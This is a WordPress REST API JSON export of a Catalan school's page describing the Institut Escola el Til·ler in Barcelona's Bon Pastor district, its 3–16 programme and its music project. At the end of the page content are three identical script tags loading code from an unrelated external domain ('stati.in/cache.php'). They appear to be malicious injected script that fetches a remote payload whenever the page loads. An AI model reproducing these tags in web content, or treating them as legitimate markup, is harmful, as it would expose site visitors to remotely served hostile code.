{"id":22,"date":"2014-09-18T12:19:57","date_gmt":"2014-09-18T11:19:57","guid":{"rendered":"http:\/\/agora.xtec.cat\/ceipbernatdeboil\/?page_id=22"},"modified":"2020-02-26T20:01:01","modified_gmt":"2020-02-26T19:01:01","slug":"lescola","status":"publish","type":"page","link":"https:\/\/agora.xtec.cat\/ietiler\/lescola\/","title":{"rendered":"Institut Escola"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p>L&#8217;institut escola el til\u00b7ler est\u00e0 situat al Barri del Bon Pastor, al districte Sant Andreu. Projecte de nova creaci\u00f3 des de l&#8217;any 2017, amb pr\u00e0ctiques pedag\u00f2giques avan\u00e7ades, i un projecte de m\u00fasica, on totes les alumnes tenen una formaci\u00f3 musical que els permetr\u00e0 saber tocar un instrument en acabar l&#8217;escolaritat obligat\u00f2ria.<\/p>\n<p>Es tracta d&#8217;un projecte 3-16 anys, institut escola p\u00fablic del barri.Una escola que esdevindr\u00e0 de doble l\u00ednia, on van nens i nenes del barri i de l&#8217;entorn m\u00e9s proper.<\/p>\n<p>El centre ofereix un espai escolar amb la mirada posada en el reconeixement de l&#8217;altre; els nens i nens, les seves fam\u00edlies, els docents i equip educatiu, monitors i totes les persones que di\u00e0riament interaccionen amb infants, joves, fam\u00edlies i professors\/es. Totes les persones conformem una vida plena d&#8217;experi\u00e8ncies, de mem\u00f2ria emocional i racional. La nostra hist\u00f2ria est\u00e0 present en cada moment de la nostra interacci\u00f3 amb l&#8217;altre i des d&#8217;aquesta perspectiva, l&#8217;institut escola el formem totes les persones que cada dia compartim les nostres viv\u00e8ncies.<\/p>\n<p>Aquest curs 2019-2020\u00a0 se&#8217;ns ha presentat un nou repte, donar continu\u00eftat a la comunitat de joves, amb un tercer d&#8217;ESO ple de propostes interessants i dos l\u00ednies de P-3 que donaran resposta a la demanda de les fam\u00edlies d&#8217;escolaritzar els seus infants de tres anys.<\/p>\n<p>Un projecte que seguir\u00e0 la mateixa mirada vers tota la Comunitat educativa, afegint totes les noves experi\u00e8ncies d&#8217;aquests darrers anys adaptant-nos als nous requeriments de la societat actual.<\/p>\n<p>Us animem a que ens vingueu a con\u00e8ixer!<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;<br \/>\nL&#8217;institut escola el til\u00b7ler est\u00e0 situat al Barri del Bon Pastor, al districte Sant Andreu. Projecte de nova creaci\u00f3 des de l&#8217;any 2017, amb pr\u00e0ctiques pedag\u00f2giques avan\u00e7ades, i un projecte de m\u00fasica, on totes les alumnes tenen una formaci\u00f3 musical que els permetr\u00e0 saber tocar&hellip;  <a href=\"https:\/\/agora.xtec.cat\/ietiler\/lescola\/\" title=\"Read Institut Escola\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/side-menu.php","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-22","page","type-page","status-publish","hentry"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/pages\/22","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/comments?post=22"}],"version-history":[{"count":3,"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/pages\/22\/revisions"}],"predecessor-version":[{"id":2486,"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/pages\/22\/revisions\/2486"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/ietiler\/wp-json\/wp\/v2\/media?parent=22"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}